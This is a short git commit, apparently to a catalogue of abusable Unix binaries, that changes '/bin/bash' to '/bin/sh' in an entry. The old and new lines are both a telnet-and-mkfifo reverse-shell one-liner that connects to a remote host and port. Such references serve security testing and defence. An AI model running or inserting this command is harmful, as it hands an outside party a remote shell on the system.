Remove hardcoded instances of bash

This commit is contained in:
Andrea Cardaci
2018-05-28 17:47:54 +02:00
parent 8185fca039
commit 358628c2f2
3 changed files with 4 additions and 4 deletions

View File

@@ -15,7 +15,7 @@ functions:
RPORT=12345
TF=$(mktemp)
rm $TF
mkfifo $TF && telnet $RHOST $RPORT 0<$TF | /bin/bash 1>$TF
mkfifo $TF && telnet $RHOST $RPORT 0<$TF | /bin/sh 1>$TF
sudo-enabled:
- description: BSD version only. Needs to be connected first.
code: |